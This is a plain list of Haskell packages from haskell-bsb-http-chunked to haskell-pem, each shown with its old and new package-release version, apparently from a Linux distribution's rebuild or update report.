            haskell-bsb-http-chunked          0.0.0.4-380          0.0.0.4-381
                     haskell-butcher          1.3.3.2-339          1.3.3.2-340
                    haskell-bv-sized             1.0.5-74             1.0.5-75
                  haskell-byte-order            0.1.3.1-8            0.1.3.1-9
                       haskell-bytes            0.17.3-33            0.17.3-34
         haskell-bytestring-encoding           0.1.2.0-79           0.1.2.0-80
           haskell-bytestring-handle          0.1.0.6-164          0.1.0.6-165
         haskell-bytestring-progress               1.4-47               1.4-48
   haskell-bytestring-strict-builder           0.4.5.7-13           0.4.5.7-14
        haskell-bytestring-to-vector           0.3.0.1-41           0.3.0.1-42
     haskell-bytestring-tree-builder          0.2.7.10-87          0.2.7.10-88
                         haskell-bz2            1.0.1.1-1            1.0.1.1-2
       haskell-cabal-install-parsers              0.4.5-8              0.4.5-9
                       haskell-cairo          0.13.10.0-1          0.13.10.0-2
                  haskell-call-stack            0.4.0-182            0.4.0-184
                 haskell-casa-client            0.0.1-684            0.0.1-686
                  haskell-casa-types            0.0.2-425            0.0.2-426
            haskell-case-insensitive          1.2.1.0-202          1.2.1.0-203
                     haskell-cassava           0.5.3.0-95           0.5.3.0-96
          haskell-cassava-megaparsec              2.1.1-5              2.1.1-6
                       haskell-cborg           0.2.9.0-39           0.2.9.0-40
                  haskell-cborg-json           0.2.5.0-85           0.2.5.0-86
                     haskell-charset            0.3.10-25            0.3.10-26
              haskell-chasingbottoms           1.3.1.13-2           1.3.1.13-3
                  haskell-cheapskate          0.1.1.2-636          0.1.1.2-637
                    haskell-checkers            0.6.0-115            0.6.0-116
                       haskell-chell           0.5.0.1-74           0.5.0.1-75
            haskell-chell-quickcheck            0.2.5.4-1            0.2.5.4-2
                     haskell-chimera            0.4.0.0-7            0.4.0.0-8
                haskell-chunked-data            0.3.1-250            0.3.1-251
                          haskell-ci            0.14.3-11            0.14.3-12
                  haskell-cipher-aes           0.2.11-325           0.2.11-326
                    haskell-citeproc             0.8.1-96             0.8.1-97
                   haskell-clash-lib             1.8.0-18             1.8.0-19
               haskell-clash-prelude             1.8.0-13             1.8.0-14
              haskell-classy-prelude          1.5.0.2-117          1.5.0.2-118
                        haskell-clay             0.15.0-7             0.15.0-8
               haskell-clientsession           0.9.2.0-24           0.9.2.0-25
                       haskell-clock              0.8.4-2              0.8.4-4
                   haskell-cmark-gfm             0.2.5-39             0.2.5-40
                 haskell-co-log-core           0.3.2.1-15           0.3.2.1-16
                haskell-coinbase-pro          0.9.3.2-159          0.9.3.2-160
                      haskell-colour            2.3.6-208            2.3.6-210
                  haskell-colourista           0.1.0.2-37           0.1.0.2-38
                  haskell-commonmark              0.2.4-1              0.2.4-2
       haskell-commonmark-extensions           0.2.3.5-27           0.2.3.5-28
           haskell-commonmark-pandoc           0.2.1.3-74           0.2.1.3-75
                     haskell-comonad            5.0.8-253            5.0.8-255
                     haskell-concise          0.1.0.1-504          0.1.0.1-505
            haskell-concurrent-extra          0.7.0.12-49          0.7.0.12-50
           haskell-concurrent-output            1.10.20-7            1.10.20-8
           haskell-concurrent-supply            0.1.8-207            0.1.8-208
                     haskell-conduit             1.3.5-48             1.3.5-49
               haskell-conduit-extra            1.3.6-129            1.3.6-130
               haskell-conduit-parse          0.2.1.1-139          0.2.1.1-140
                  haskell-config-ini           0.2.6.0-34           0.2.6.0-35
               haskell-config-schema           1.3.0.0-86           1.3.0.0-87
                  haskell-configfile             1.1.4-84             1.1.4-85
                haskell-configurator          0.3.0.0-392          0.3.0.0-393
             haskell-configurator-pg              0.2.8-8              0.2.8-9
                 haskell-constraints            0.13.4-48            0.13.4-49
          haskell-constraints-extras           0.4.0.0-72           0.4.0.0-73
                    haskell-cracknum              3.2-243              3.2-244
                     haskell-critbit          0.2.0.0-253          0.2.0.0-254
                   haskell-criterion           1.6.1.0-17           1.6.1.0-18
       haskell-criterion-measurement           0.2.1.0-53           0.2.1.0-54
            haskell-crypto-api-tests              0.3-254              0.3-255
         haskell-crypto-cipher-types            0.0.9-325            0.0.9-326
               haskell-crypto-enigma           0.1.1.6-99          0.1.1.6-100
         haskell-crypto-pubkey-types            0.4.3-335            0.4.3-336
               haskell-crypto-random            0.0.9-332            0.0.9-333
                haskell-crypto-token             0.0.2-11             0.0.2-12
                  haskell-cryptohash           0.11.9-342           0.11.9-343
              haskell-cryptohash-md5       0.11.101.0-100       0.11.101.0-101
             haskell-cryptohash-sha1        0.11.101.0-82        0.11.101.0-83
           haskell-cryptohash-sha256        0.11.102.1-90        0.11.102.1-91
                     haskell-crypton              0.34-10              0.34-11
             haskell-crypton-conduit             0.2.3-47             0.2.3-48
          haskell-crypton-connection              0.3.2-6              0.3.2-7
                haskell-crypton-x509             1.7.6-27             1.7.6-28
          haskell-crypton-x509-store             1.6.9-27             1.6.9-28
         haskell-crypton-x509-system             1.6.7-27             1.6.7-28
     haskell-crypton-x509-validation            1.6.12-27            1.6.12-28
                  haskell-cryptonite              0.30-72              0.30-73
          haskell-cryptonite-conduit            0.2.2-626            0.2.2-627
                    haskell-css-text          0.1.3.0-283          0.1.3.0-284
                  haskell-curve25519              0.2.8-9             0.2.8-10
             haskell-data-array-byte           0.1.0.1-53           0.1.0.1-55
                  haskell-data-clist               0.2-68               0.2-69
                haskell-data-default          0.7.1.1-305          0.7.1.1-306
haskell-data-default-instances-dlist            0.0.1-318            0.0.1-319
                  haskell-data-dword           0.3.2.1-83           0.3.2.1-84
                    haskell-data-fix            0.3.2-101            0.3.2-102
       haskell-data-functor-logistic               0.0-40               0.0-41
             haskell-data-serializer            0.3.5-202            0.3.5-203
                haskell-data-textual          0.3.0.3-323          0.3.0.3-324
             haskell-data-tree-print          0.1.0.2-146          0.1.0.2-147
                         haskell-dav            1.3.4-651            1.3.4-652
                        haskell-dbus              1.3.1-9             1.3.1-10
               haskell-dbus-hslogger          0.1.0.1-484          0.1.0.1-485
                     haskell-decimal            0.5.2-125            0.5.2-126
              haskell-deferred-folds          0.9.18.6-20          0.9.18.6-21
        haskell-dense-linear-algebra          0.1.0.0-291          0.1.0.0-292
               haskell-dependent-map          0.4.0.0-226          0.4.0.0-227
               haskell-dependent-sum           0.7.2.0-69           0.7.2.0-70
      haskell-dependent-sum-template          0.1.1.1-143          0.1.1.1-144
                       haskell-deque           0.4.4.1-28           0.4.4.1-29
              haskell-deriving-aeson             0.2.9-63             0.2.9-64
             haskell-deriving-compat              0.6.6-1              0.6.6-2
                        haskell-diff             0.4.1-74             0.4.1-75
                      haskell-digits             0.3.1-20             0.3.1-21
               haskell-direct-sqlite             2.3.29-6             2.3.29-7
                haskell-distributive          0.6.2.1-208          0.6.2.1-209
                       haskell-dlist              1.0-240              1.0-241
             haskell-dlist-instances          0.1.1.1-212          0.1.1.1-213
                         haskell-dns             4.1.1-11             4.1.1-12
                   haskell-doclayout           0.4.0.1-28           0.4.0.1-29
                      haskell-docopt            0.7.0.8-4            0.7.0.8-5
                haskell-doctemplates              0.11-67              0.11-68
                     haskell-doctest            0.20.1-76            0.20.1-78
            haskell-doctest-discover           0.2.0.0-66           0.2.0.0-67
          haskell-doctest-driver-gen            0.3.0.8-9           0.3.0.8-10
      haskell-doctest-exitcode-stdio              0.0-134              0.0-136
                 haskell-doctest-lib             0.1.1-15             0.1.1-17
            haskell-doctest-parallel              0.3.1-6              0.3.1-7
           haskell-double-conversion            2.0.5.0-4            2.0.5.0-5
                   haskell-easy-file             0.2.5-20             0.2.5-21
                  haskell-edisoncore             1.3.3-37             1.3.3-38
               haskell-edit-distance          0.2.2.1-206          0.2.2.1-207
        haskell-edit-distance-vector          1.0.0.4-340          1.0.0.4-341
                      haskell-either            5.0.2-113            5.0.2-114
              haskell-email-validate           2.3.2.20-1           2.3.2.20-2
                      haskell-emojis              0.1.3-9             0.1.3-10
         haskell-enclosed-exceptions            1.0.3-252            1.0.3-253
                  haskell-enummapset           0.7.2.0-21           0.7.2.0-22
                 haskell-equivalence             0.4.1-48             0.4.1-49
                      haskell-errors             2.3.0-73             2.3.0-74
                   haskell-esqueleto           3.5.8.0-17           3.5.8.0-18
                    haskell-exact-pi           0.5.0.2-60           0.5.0.2-61
          haskell-expiring-cache-map          0.0.6.1-316          0.0.6.1-317
                       haskell-extra            1.7.14-34            1.7.14-35
                 haskell-fast-logger             3.1.2-69             3.1.2-70
                    haskell-fclabels          2.0.5.1-111          2.0.5.1-112
                  haskell-fdo-notify            0.3.1-733            0.3.1-734
                        haskell-feed          1.3.2.1-159          1.3.2.1-160
                         haskell-fgl            5.8.2.0-7            5.8.2.0-8
               haskell-fgl-arbitrary          0.2.0.6-129          0.2.0.6-130
                    haskell-filelock           0.1.1.7-11           0.1.1.7-12
                   haskell-filemanip          0.3.6.3-144          0.3.6.3-145
         haskell-filepath-bytestring         1.4.2.1.13-3         1.4.2.1.13-4
                 haskell-filepattern             0.1.3-87             0.1.3-88
                   haskell-filestore             0.6.5-48             0.6.5-49
                   haskell-filtrable          0.1.6.0-182          0.1.6.0-183
                         haskell-fin               0.3-23               0.3-24
                  haskell-fingertree           0.1.5.0-68           0.1.5.0-69
             haskell-finite-typelits           0.1.6.0-43           0.1.6.0-44
           haskell-flexible-defaults            0.0.3-153            0.0.3-154
                    haskell-floskell            0.10.8-18            0.10.8-19
                       haskell-focus           1.0.3.2-27           1.0.3.2-28
               haskell-fold-debounce          0.2.0.10-30          0.2.0.10-31
    haskell-foldable1-classes-compat               0.1-69               0.1-71
                       haskell-foldl             1.4.16-1             1.4.16-2
                  haskell-foundation            0.0.30-19            0.0.30-20
                    haskell-fourmolu            0.9.0.0-9           0.9.0.0-10
                        haskell-free            5.1.10-66            5.1.10-67
                    haskell-fsnotify           0.4.0.0-64           0.4.0.0-65
                 haskell-fsnotify0.3           0.3.0.1-64           0.3.0.1-65
                       haskell-fuzzy           0.1.1.0-17           0.1.1.0-18
                       haskell-gauge            0.2.5-223            0.2.5-224
                haskell-generic-data            1.1.0.0-5            1.1.0.0-6
            haskell-generic-deriving            1.14.5-20            1.14.5-21
                haskell-generic-lens           2.2.2.0-43           2.2.2.0-44
              haskell-generic-random           1.5.0.1-85           1.5.0.1-86
                 haskell-genvalidity           1.1.0.0-42           1.1.0.0-43
           haskell-genvalidity-hspec            1.0.0.3-9           1.0.0.3-10
        haskell-genvalidity-property           1.0.0.0-90           1.0.0.0-91
             haskell-getopt-generics          0.13.1.0-29          0.13.1.0-30
                   haskell-ghc-check           0.5.0.8-43           0.5.0.8-44
              haskell-ghc-exactprint              1.5.0-6              1.5.0-7
           haskell-ghc-lib-parser-ex            9.2.1.1-6            9.2.1.1-7
              haskell-ghc-source-gen            0.4.4.1-1            0.4.4.1-2
          haskell-ghc-typelits-extra             0.4.4-34             0.4.4-35
       haskell-ghc-typelits-knownnat              0.7.8-7              0.7.8-8
   haskell-ghc-typelits-natnormalise              0.7.8-4              0.7.8-5
                      haskell-ghcide           1.9.1.0-75           1.9.1.0-76
           haskell-ghcide-test-utils          1.8.0.0-201          1.8.0.0-202
                          haskell-gi            0.26.4-67            0.26.4-69
                      haskell-gi-atk            2.0.27-65            2.0.27-66
                    haskell-gi-cairo            1.0.29-51            1.0.29-53
          haskell-gi-cairo-connector            0.1.1-123            0.1.1-124
             haskell-gi-cairo-render             0.1.2-38             0.1.2-39
                 haskell-gi-dbusmenu            0.4.13-13            0.4.13-14
             haskell-gi-dbusmenugtk3             0.4.14-9            0.4.14-10
                haskell-gi-freetype2             2.0.4-49             2.0.4-51
                      haskell-gi-gdk             4.0.7-63             4.0.7-64
                     haskell-gi-gdk3           3.0.25-136           3.0.25-137
                  haskell-gi-gdk3x11           3.0.12-138           3.0.12-139
                haskell-gi-gdkpixbuf            2.0.31-24            2.0.31-25
                   haskell-gi-gdkx11             4.0.7-70             4.0.7-71
                      haskell-gi-gio            2.0.32-61            2.0.32-62
                     haskell-gi-glib            2.0.29-55            2.0.29-56
                  haskell-gi-gmodule             2.0.5-60             2.0.5-61
                  haskell-gi-gobject            2.0.30-65            2.0.30-66
                 haskell-gi-graphene             1.0.7-48             1.0.7-49
                      haskell-gi-gsk             4.0.7-48             4.0.7-49
                      haskell-gi-gtk             4.0.8-32             4.0.8-33
                   haskell-gi-gtk-hs            0.3.16-16            0.3.16-17
                     haskell-gi-gtk3           3.0.38-138           3.0.38-139
                 haskell-gi-harfbuzz             0.0.9-47             0.0.9-48
                    haskell-gi-pango            1.0.29-68            1.0.29-69
                     haskell-gi-xlib             2.0.13-9            2.0.13-11
                         haskell-gio         0.13.10.0-22         0.13.10.0-23
                     haskell-git-lfs              1.2.2-9             1.2.2-10
                     haskell-githash          0.1.6.3-126          0.1.6.3-127
                        haskell-glib         0.13.10.0-12         0.13.10.0-13
                        haskell-glob            0.10.2-89            0.10.2-90
                    haskell-graphite         0.10.0.1-210         0.10.0.1-211
                    haskell-graphviz        2999.20.2.0-1        2999.20.2.0-2
                  haskell-gridtables           0.1.0.0-47           0.1.0.0-48
                haskell-gtk-sni-tray          0.1.8.1-159          0.1.8.1-160
                   haskell-gtk-strut          0.1.3.2-137          0.1.3.2-138
           haskell-gtk2hs-buildtools          0.13.10.0-4          0.13.10.0-5
                        haskell-gtk3            0.15.7-68            0.15.7-69
                  haskell-hackage-db             2.1.3-44             2.1.3-45
            haskell-hackage-security            0.6.2.5-1            0.6.2.5-2
             haskell-haddock-library            1.11.0-12            1.11.0-13
                     haskell-hadrian     0.1.0.0+9.4.8-10     0.1.0.0+9.4.8-11
                      haskell-hakyll         4.16.0.0-147         4.16.0.0-149
                        haskell-half            0.3.1-150            0.3.1-151
            haskell-happstack-server             7.9.0-10             7.9.0-11
                    haskell-hashable           1.4.3.0-44           1.4.3.0-46
               haskell-hashable-time              0.3-113              0.3-114
                  haskell-hashtables             1.3.1-37             1.3.1-38
                       haskell-hasql          1.5.0.4-113          1.5.0.4-114
    haskell-hasql-dynamic-statements           0.3.1.1-92           0.3.1.1-93
             haskell-hasql-implicits          0.1.0.5-132          0.1.0.5-133
         haskell-hasql-notifications           0.2.0.4-14           0.2.0.4-15
                  haskell-hasql-pool          0.5.2.2-214          0.5.2.2-215
           haskell-hasql-transaction          1.0.1.1-234          1.0.1.1-235
                    haskell-heapsize          0.3.0.1-215          0.3.0.1-216
                    haskell-hedgehog               1.2-17               1.2-18
            haskell-hedgehog-classes           0.2.5.4-68           0.2.5.4-69
                        haskell-here            1.2.14-16            1.2.14-17
                        haskell-hgmp           0.1.2.1-16           0.1.2.1-17
              haskell-hi-file-parser            0.1.6.0-7            0.1.6.0-8
                    haskell-hie-bios            0.11.0-82            0.11.0-83
                       haskell-hiedb           0.4.2.0-66           0.4.2.0-67
                    haskell-hinotify            0.4.1-170            0.4.1-171
                        haskell-hint           0.9.0.6-42           0.9.0.6-43
                      haskell-hjsmin          0.2.0.4-224          0.2.0.4-225
                 haskell-hledger-lib            1.32.1-29            1.32.1-30
haskell-hls-alternate-number-format-plugin    1.3.0.0-160          1.3.0.0-161
        haskell-hls-cabal-fmt-plugin          0.1.0.0-160          0.1.0.0-161
            haskell-hls-cabal-plugin          0.1.0.0-160          0.1.0.0-161
   haskell-hls-call-hierarchy-plugin          1.2.0.0-160          1.2.0.0-161
haskell-hls-change-type-signature-plugin      1.1.0.0-160          1.1.0.0-161
            haskell-hls-class-plugin          1.1.1.0-160          1.1.1.0-161
       haskell-hls-code-range-plugin          1.1.0.0-160          1.1.0.0-161
             haskell-hls-eval-plugin          1.4.0.0-160          1.4.0.0-161
  haskell-hls-explicit-fixity-plugin          1.1.0.0-160          1.1.0.0-161
 haskell-hls-explicit-imports-plugin          1.2.0.0-160          1.2.0.0-161
haskell-hls-explicit-record-fields-plugin     1.0.0.0-160          1.0.0.0-161
         haskell-hls-floskell-plugin          1.0.2.0-163          1.0.2.0-164
         haskell-hls-fourmolu-plugin          1.1.1.0-170          1.1.1.0-171
             haskell-hls-gadt-plugin          1.0.1.0-160          1.0.1.0-161
                   haskell-hls-graph          1.9.0.0-117          1.9.0.0-118
            haskell-hls-hlint-plugin           1.1.2.0-49           1.1.2.0-50
      haskell-hls-module-name-plugin          1.1.1.0-160          1.1.1.0-161
           haskell-hls-ormolu-plugin           1.0.4.0-52           1.0.4.0-53
              haskell-hls-plugin-api          1.6.0.0-130          1.6.0.0-131
          haskell-hls-pragmas-plugin          1.0.4.0-160          1.0.4.0-161
haskell-hls-qualify-imported-names-plugin     1.0.2.0-160          1.0.2.0-161
         haskell-hls-refactor-plugin          1.1.0.0-160          1.1.0.0-161
   haskell-hls-refine-imports-plugin          1.0.4.0-160          1.0.4.0-161
           haskell-hls-rename-plugin          1.0.2.0-160          1.0.2.0-161
           haskell-hls-retrie-plugin          1.0.3.0-160          1.0.3.0-161
           haskell-hls-splice-plugin          1.0.3.0-160          1.0.3.0-161
  haskell-hls-stylish-haskell-plugin          1.0.1.2-162          1.0.1.2-163
              haskell-hls-test-utils          1.5.0.0-160          1.5.0.0-161
                     haskell-hoauth2             2.7.0-13             2.7.0-15
                      haskell-hookup                0.8-9               0.8-10
                    haskell-hopenpgp            2.9.8-182            2.9.8-183
                        haskell-hosc              0.20-34              0.20-35
                   haskell-hourglass           0.2.12-245           0.2.12-246
                       haskell-hpack           0.35.2-109           0.35.2-110
                 haskell-hs-bibutils         6.10.0.0-149         6.10.0.0-150
                       haskell-hsini           0.5.2.2-10           0.5.2.2-11
                    haskell-hslogger          1.3.1.0-229          1.3.1.0-230
                       haskell-hslua             2.3.0-46             2.3.0-47
                 haskell-hslua-aeson           2.3.0.1-28           2.3.0.1-29
               haskell-hslua-classes             2.3.0-47             2.3.0-48
                  haskell-hslua-core             2.3.1-41             2.3.1-42
                  haskell-hslua-list             1.1.1-54             1.1.1-55
           haskell-hslua-marshalling             2.3.0-42             2.3.0-43
      haskell-hslua-module-doclayout             1.1.0-52             1.1.0-53
           haskell-hslua-module-path             1.1.0-47             1.1.0-48
         haskell-hslua-module-system           1.1.0.1-21           1.1.0.1-22
           haskell-hslua-module-text           1.1.0.1-21           1.1.0.1-22
        haskell-hslua-module-version             1.1.0-47             1.1.0-48
            haskell-hslua-module-zip             1.1.1-16             1.1.1-17
     haskell-hslua-objectorientation             2.3.0-43             2.3.0-44
             haskell-hslua-packaging              2.3.1-8              2.3.1-9
                  haskell-hslua-repl              0.1.2-7              0.1.2-8
                haskell-hslua-typing              0.1.1-1              0.1.1-2
                   haskell-hsopenssl          0.11.7.6-21          0.11.7.6-22
       haskell-hsopenssl-x509-system           0.1.0.4-53           0.1.0.4-54
                       haskell-hspec           2.10.9-105           2.10.9-108
            haskell-hspec-attoparsec          0.1.0.2-181          0.1.0.2-182
               haskell-hspec-contrib             0.5.2-25             0.5.2-26
                  haskell-hspec-core            2.10.9-95            2.10.9-97
              haskell-hspec-discover            2.10.9-49            2.10.9-51
          haskell-hspec-expectations             0.8.3-37             0.8.3-39
   haskell-hspec-expectations-lifted           0.10.0-167           0.10.0-168
                haskell-hspec-golden           0.2.1.0-21           0.2.1.0-22
              haskell-hspec-hedgehog          0.0.1.2-255          0.0.1.2-256
            haskell-hspec-megaparsec              2.2.1-1              2.2.1-2
                  haskell-hspec-meta           2.10.5-126           2.10.5-128
            haskell-hspec-smallcheck             0.5.3-41             0.5.3-42
                   haskell-hspec-wai           0.11.1-415           0.11.1-416
              haskell-hspec-wai-json           0.11.0-477           0.11.0-478
             haskell-hstringtemplate             0.8.8-46             0.8.8-47
                      haskell-hsyaml            0.2.1.3-2            0.2.1.3-3
                haskell-hsyaml-aeson          0.2.0.1-170          0.2.0.1-171
                         haskell-htf          0.15.0.1-62          0.15.0.1-63
                haskell-html-conduit          1.3.2.2-217          1.3.2.2-218
             haskell-html-entity-map          0.1.0.0-166          0.1.0.0-167
                  haskell-html-parse           0.2.1.0-17           0.2.1.0-18
                        haskell-http         4000.4.1-189         4000.4.1-190
               haskell-http-api-data             0.5.1-50             0.5.1-51
                 haskell-http-client            0.7.15-19            0.7.15-20
      haskell-http-client-restricted             0.1.0-15             0.1.0-16
             haskell-http-client-tls           0.3.6.3-53           0.3.6.3-54
                 haskell-http-common          0.8.3.4-156          0.8.3.4-157
                haskell-http-conduit           2.3.8.3-48           2.3.8.3-50
                   haskell-http-date           0.0.11-135           0.0.11-136
               haskell-http-download           0.2.1.0-80           0.2.1.0-82
                  haskell-http-media           0.8.1.1-13           0.8.1.1-14
                haskell-http-streams           0.8.9.9-32           0.8.9.9-34
                  haskell-http-types             0.12.4-2             0.12.4-3
                       haskell-http2             4.1.0-16             4.1.0-17
                       haskell-http3             0.0.2-20             0.0.2-21
                  haskell-httpd-shed            0.4.1.2-1            0.4.1.2-2
                       haskell-hunit          1.6.2.0-225          1.6.2.0-227
               haskell-hw-fingertree           0.1.2.1-47           0.1.2.1-48
           haskell-hw-hspec-hedgehog           0.1.1.1-66           0.1.1.1-67
                     haskell-hw-prim           0.6.3.2-66           0.6.3.2-67
                         haskell-hxt         9.3.1.22-127         9.3.1.22-128
                 haskell-hyphenation            0.8.2-158            0.8.2-159
                haskell-implicit-hie          0.1.2.7-148          0.1.2.7-149
         haskell-implicit-hie-cradle           0.5.0.1-12           0.5.0.1-13
          haskell-incremental-parser             0.5.1-10             0.5.1-11
       haskell-indexed-list-literals          0.2.1.3-104          0.2.1.3-105
         haskell-indexed-traversable             0.1.3-61             0.1.3-63
haskell-indexed-traversable-instances          0.1.1.2-40           0.1.1.2-41
               haskell-infer-license            0.2.0-248            0.2.0-249
               haskell-infinite-list             0.1.1-10             0.1.1-11
                         haskell-ini             0.4.2-82             0.4.2-83
               haskell-input-parsers           0.3.0.2-18           0.3.0.2-19
   haskell-insert-ordered-containers           0.2.5.3-40           0.2.5.3-41
               haskell-integer-roots           1.0.2.0-71           1.0.2.0-72
                 haskell-interpolate            0.2.1-322            0.2.1-323
    haskell-interpolatedstring-perl6            1.0.2-286            1.0.2-287
                   haskell-invariant              0.6.3-2              0.6.3-3
                  haskell-io-streams           1.5.2.2-49           1.5.2.2-50
          haskell-io-streams-haproxy          1.0.1.0-273          1.0.1.0-274
                      haskell-iospec           0.3.1.2-21           0.3.1.2-22
                     haskell-iproute            1.7.12-81            1.7.12-82
                       haskell-ipynb              0.2-135              0.2-136
              haskell-ipython-kernel          0.11.0.0-27          0.11.0.0-28
                    haskell-irc-core              2.11-48              2.11-49
           haskell-isomorphism-class           0.1.0.11-1           0.1.0.11-2
                 haskell-ixset-typed          0.5.1.0-146          0.5.1.0-147
            haskell-jira-wiki-markup             1.5.1-21             1.5.1-22
                        haskell-jose              0.10-95              0.10-96
                   haskell-js-jquery            3.3.1-996            3.3.1-997
                        haskell-json             0.10-151             0.10-152
                    haskell-json-ast             0.3.2-62             0.3.2-63
                 haskell-juicypixels             3.3.8-30             3.3.8-31
              haskell-kan-extensions            5.2.5-102            5.2.5-103
                        haskell-keys           3.12.3-303           3.12.3-304
                        haskell-knob             0.2.2-25             0.2.2-26
                    haskell-kvitable            1.0.3.0-3            1.0.3.0-4
           haskell-lambdabot-trusted           5.3.1.2-47           5.3.1.2-48
                  haskell-lambdahack           0.11.0.1-8           0.11.0.1-9
         haskell-language-javascript          0.7.1.0-158          0.7.1.0-159
             haskell-language-python            0.5.8-154            0.5.8-155
             haskell-language-server           1.9.1.0-90           1.9.1.0-91
                    haskell-lattices               2.1-59               2.1-60
                        haskell-lens             5.2.3-38             5.2.3-39
                 haskell-lens-action            0.2.6-172            0.2.6-173
                  haskell-lens-aeson             1.2.3-42             1.2.3-43
                       haskell-libbf           0.6.5.1-42           0.6.5.1-43
                      haskell-libmpd         0.10.0.0-153         0.10.0.0-154
                     haskell-libyaml            0.1.2-345            0.1.2-346
                haskell-lifted-async          0.10.2.5-22          0.10.2.5-23
                 haskell-lifted-base         0.2.3.12-266         0.2.3.12-267
                      haskell-linear              1.22-79              1.22-80
                 haskell-linear-base             0.3.0-61             0.3.0-62
             haskell-linear-generics             0.2.1-25             0.2.1-26
                      haskell-list-t           1.0.5.4-70           1.0.5.4-71
                    haskell-listlike            4.7.8.2-4            4.7.8.2-5
              haskell-logging-facade            0.3.1-174            0.3.1-176
                      haskell-logict          0.7.1.0-244          0.7.1.0-246
                        haskell-loop            0.3.0-245            0.3.0-246
                        haskell-lpeg             1.0.4-25             1.0.4-26
                         haskell-lsp           1.6.0.0-79           1.6.0.0-80
                    haskell-lsp-test          0.14.1.0-93          0.14.1.0-94
              haskell-lsp-test0.14.0          0.14.0.2-96          0.14.0.2-97
                   haskell-lsp-types           1.6.0.0-72           1.6.0.0-73
                haskell-lsp-types1.4           1.4.0.1-74           1.4.0.1-75
                      haskell-lsp1.4           1.4.0.0-87           1.4.0.0-88
                         haskell-lua              2.3.2-5              2.3.2-6
               haskell-lua-arbitrary           1.0.1.1-26           1.0.1.1-27
                       haskell-lucid     2.11.20230408-44     2.11.20230408-45
                       haskell-lukko          0.1.1.3-187          0.1.1.3-188
                  haskell-lumberjack           1.0.3.0-38           1.0.3.0-39
              haskell-markdown-unlit            0.5.1-158            0.5.1-159
              haskell-math-functions           0.3.4.3-38            0.3.4.4-4
                  haskell-megaparsec              9.5.0-9             9.5.0-10
                      haskell-memory             0.18.0-7             0.18.0-8
                    haskell-memotrie           0.6.10-217           0.6.10-218
      haskell-mersenne-random-pure64          0.2.2.0-178          0.2.2.0-179
                  haskell-microaeson           0.1.0.1-47           0.1.0.1-48
             haskell-microlens-aeson              2.5.2-3              2.5.2-4
          haskell-microlens-platform            0.4.3.5-9           0.4.3.5-10
                   haskell-microspec          0.2.1.3-217          0.2.1.3-218
                 haskell-microstache           1.0.2.3-64           1.0.2.3-65
                   haskell-mime-mail            0.5.1-136            0.5.1-137
                   haskell-minimorph           0.3.0.1-45           0.3.0.1-46
                   haskell-miniutter           0.5.1.2-45           0.5.1.2-46
                    haskell-missingh           1.6.0.1-20           1.6.0.1-21
                       haskell-mmark          0.0.7.6-169          0.0.7.6-170
                     haskell-mockery            0.3.5-608            0.3.5-610
                         haskell-mod           0.2.0.1-47           0.2.0.1-48
                  haskell-modern-uri            0.3.6.1-3            0.3.6.1-4
               haskell-monad-control          1.0.3.1-101          1.0.3.1-102
              haskell-monad-dijkstra           0.1.1.5-22           0.1.1.5-23
               haskell-monad-journal            0.8.1-268            0.8.1-269
                haskell-monad-logger            0.3.40-55            0.3.40-56
                  haskell-monad-memo             0.5.4-79             0.5.4-80
                   haskell-monad-par             0.3.6-15             0.3.6-16
            haskell-monad-par-extras            0.3.3-215            0.3.3-216
                 haskell-monadrandom               0.6-35               0.6-36
            haskell-mono-traversable           1.0.17.0-3           1.0.17.0-4
  haskell-mono-traversable-instances          0.1.1.0-219          0.1.1.0-220
           haskell-monoid-subclasses           1.2.4.1-31           1.2.4.1-32
                      haskell-mueval            0.9.3-187            0.9.3-188
                  haskell-multistate           0.8.0.4-75           0.8.0.4-76
                    haskell-mustache             2.4.2-93             2.4.2-94
          haskell-mutable-containers           0.3.4.1-84           0.3.4.1-85
                  haskell-mwc-random         0.15.0.2-108         0.15.0.2-109
                       haskell-mysql             0.2.1-85             0.2.1-86
                haskell-mysql-simple             0.4.9-38             0.4.9-39
                    haskell-nanospec            0.2.2-357            0.2.2-359
          haskell-neat-interpolation           0.5.1.4-34           0.5.1.4-35
                      haskell-nettle            0.3.1.1-1            0.3.1.1-2
                     haskell-network           3.1.4.0-19           3.1.4.0-20
                 haskell-network-bsd          2.8.1.0-209          2.8.1.0-210
                  haskell-network-ip          0.3.0.3-334          0.3.0.3-335
           haskell-network-multicast            0.3.2-211            0.3.2-212
       haskell-network-protocol-xmpp            0.4.10-98            0.4.10-99
                 haskell-network-run              0.2.7-1              0.2.7-2
              haskell-network-simple             0.4.5-97             0.4.5-98
                 haskell-network-udp             0.0.0-30             0.0.0-31
                 haskell-network-uri           2.6.4.2-30           2.6.4.2-31
            haskell-newtype-generics             0.6.2-55             0.6.2-56
                haskell-non-negative            0.1.2-241            0.1.2-242
                       haskell-nonce            1.0.7-304            1.0.7-305
                    haskell-nothunks              0.2.0-1              0.2.0-2
                     haskell-numbers        3000.2.0.2-45        3000.2.0.2-46
                        haskell-oeis           0.3.10-170           0.3.10-171
                   haskell-one-liner              2.1-112              2.1-113
                    haskell-onetuple             0.3.1-74             0.3.1-75
          haskell-openpgp-asciiarmor            0.1.2-239            0.1.2-240
             haskell-openssl-streams          1.2.3.0-212          1.2.3.0-213
               haskell-opentelemetry             0.8.0-47             0.8.0-48
                 haskell-optics-core           0.4.1.1-33           0.4.1.1-34
                haskell-optics-extra          0.4.2.1-113          0.4.2.1-114
                   haskell-optics-th             0.4.1-39             0.4.1-40
        haskell-optparse-applicative          0.17.1.0-27          0.17.1.0-29
            haskell-optparse-generic              1.5.2-9             1.5.2-10
             haskell-optparse-simple          0.1.1.4-317          0.1.1.4-318
                      haskell-ormolu            0.5.0.1-7            0.5.0.1-8
                       haskell-pager           0.1.1.0-52           0.1.1.0-53
                      haskell-pandoc             3.1.8-18             3.1.8-19
           haskell-pandoc-lua-engine            0.2.1.2-4            0.2.1.2-5
          haskell-pandoc-lua-marshal              0.2.3-3              0.2.3-4
               haskell-pandoc-server           0.1.0.5-21           0.1.0.5-22
                haskell-pandoc-types            1.23.1-17            1.23.1-18
                       haskell-pango          0.13.8.2-73          0.13.8.2-74
                      haskell-pantry            0.5.7-234            0.5.7-236
         haskell-parameterized-utils           2.1.8.0-12           2.1.8.0-13
                     haskell-parsers          0.12.11-115          0.12.11-116
                        haskell-path             0.9.5-12             0.9.5-13
                     haskell-path-io             1.8.1-54             1.8.1-55
                  haskell-pcg-random           0.1.4.0-22           0.1.4.0-23
                  haskell-pcre-heavy           1.0.0.3-36           1.0.0.3-37
                  haskell-pcre-light           0.4.1.2-26           0.4.1.2-27
                         haskell-pem            0.2.4-285            0.2.4-286
